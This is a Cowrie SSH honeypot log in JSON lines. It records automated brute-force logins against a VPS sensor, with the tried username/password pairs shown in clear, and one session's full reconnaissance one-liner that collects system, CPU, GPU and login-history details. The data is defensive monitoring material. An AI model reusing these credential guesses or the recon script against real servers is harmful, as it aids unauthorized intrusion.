{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:54:49.081801Z","src_ip":"51.79.164.132","session":"5cc9a42d3ba1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:54:49.082614Z","src_ip":"51.79.164.132","session":"5cc9a42d3ba1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:54:49.727138Z","src_ip":"51.79.164.132","session":"5cc9a42d3ba1"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:54:49.728519Z","src_ip":"51.79.164.132","session":"5cc9a42d3ba1"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":47456,"dst_ip":"1.2.3.4","dst_port":22,"session":"49f9098b835e","protocol":"ssh","message":"New connection: 51.79.164.132:47456 (1.2.3.4:22) [session: 49f9098b835e]","sensor":"my-vps","timestamp":"2025-08-28T08:55:14.096290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:55:14.455887Z","src_ip":"51.79.164.132","session":"49f9098b835e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:55:14.456734Z","src_ip":"51.79.164.132","session":"49f9098b835e"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-28T08:55:18.438178Z","src_ip":"51.79.164.132","session":"49f9098b835e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":51360,"dst_ip":"1.2.3.4","dst_port":22,"session":"6756cce7e0d5","protocol":"ssh","message":"New connection: 185.93.89.7:51360 (1.2.3.4:22) [session: 6756cce7e0d5]","sensor":"my-vps","timestamp":"2025-08-28T08:55:18.842125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:55:18.843019Z","src_ip":"185.93.89.7","session":"6756cce7e0d5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:55:18.860817Z","src_ip":"185.93.89.7","session":"6756cce7e0d5"}
{"eventid":"cowrie.login.success","username":"root","password":"index@2024","message":"login attempt [root/index@2024] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:55:18.903427Z","src_ip":"185.93.89.7","session":"6756cce7e0d5"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:55:18.941629Z","src_ip":"185.93.89.7","session":"6756cce7e0d5"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:55:19.965358Z","src_ip":"51.79.164.132","session":"49f9098b835e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":45312,"dst_ip":"1.2.3.4","dst_port":22,"session":"a17fcd0ae89b","protocol":"ssh","message":"New connection: 185.93.89.7:45312 (1.2.3.4:22) [session: a17fcd0ae89b]","sensor":"my-vps","timestamp":"2025-08-28T08:55:28.388658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:55:28.389696Z","src_ip":"185.93.89.7","session":"a17fcd0ae89b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:55:28.407758Z","src_ip":"185.93.89.7","session":"a17fcd0ae89b"}
{"eventid":"cowrie.login.success","username":"root","password":"Index@2024","message":"login attempt [root/Index@2024] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:55:28.446087Z","src_ip":"185.93.89.7","session":"a17fcd0ae89b"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:55:28.465614Z","src_ip":"185.93.89.7","session":"a17fcd0ae89b"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":47648,"dst_ip":"1.2.3.4","dst_port":22,"session":"169ea3324c5c","protocol":"ssh","message":"New connection: 51.79.164.132:47648 (1.2.3.4:22) [session: 169ea3324c5c]","sensor":"my-vps","timestamp":"2025-08-28T08:55:40.738993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:55:40.849432Z","src_ip":"51.79.164.132","session":"169ea3324c5c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:55:41.194400Z","src_ip":"51.79.164.132","session":"169ea3324c5c"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:55:42.495756Z","src_ip":"51.79.164.132","session":"169ea3324c5c"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:55:44.198580Z","src_ip":"51.79.164.132","session":"169ea3324c5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39704,"dst_ip":"1.2.3.4","dst_port":22,"session":"b56ef58c1271","protocol":"ssh","message":"New connection: 212.227.235.229:39704 (1.2.3.4:22) [session: b56ef58c1271]","sensor":"my-vps","timestamp":"2025-08-28T08:55:49.197989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:55:50.840732Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:55:50.841528Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.login.success","username":"root","password":"pass123","message":"login attempt [root/pass123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:55:59.576706Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:56:03.033021Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.033767Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.034609Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.035748Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.036782Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.037600Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.038397Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.039382Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.039911Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.040498Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.040895Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.041692Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:56:03.042158Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:56:04.570987Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:04.571979Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.session.closed","duration":"15.4","message":"Connection lost after 15.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:04.573587Z","src_ip":"212.227.235.229","session":"b56ef58c1271"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38258,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ad79d498064","protocol":"ssh","message":"New connection: 212.227.125.160:38258 (1.2.3.4:22) [session: 2ad79d498064]","sensor":"my-vps","timestamp":"2025-08-28T08:56:05.621013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.3.0","message":"Remote SSH version: SSH-2.0-libssh-0.3.0","sensor":"my-vps","timestamp":"2025-08-28T08:56:05.800277Z","src_ip":"212.227.125.160","session":"2ad79d498064"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:56:05.977232Z","src_ip":"212.227.125.160","session":"2ad79d498064"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56270,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cc69420bfbb","protocol":"ssh","message":"New connection: 51.79.164.132:56270 (1.2.3.4:22) [session: 1cc69420bfbb]","sensor":"my-vps","timestamp":"2025-08-28T08:56:06.898551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:56:07.086568Z","src_ip":"51.79.164.132","session":"1cc69420bfbb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:56:07.661523Z","src_ip":"51.79.164.132","session":"1cc69420bfbb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:56:08.782279Z","src_ip":"51.79.164.132","session":"1cc69420bfbb"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48096,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1588d65b1f2","protocol":"ssh","message":"New connection: 185.93.89.7:48096 (1.2.3.4:22) [session: c1588d65b1f2]","sensor":"my-vps","timestamp":"2025-08-28T08:56:09.102795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:56:09.103504Z","src_ip":"185.93.89.7","session":"c1588d65b1f2"}
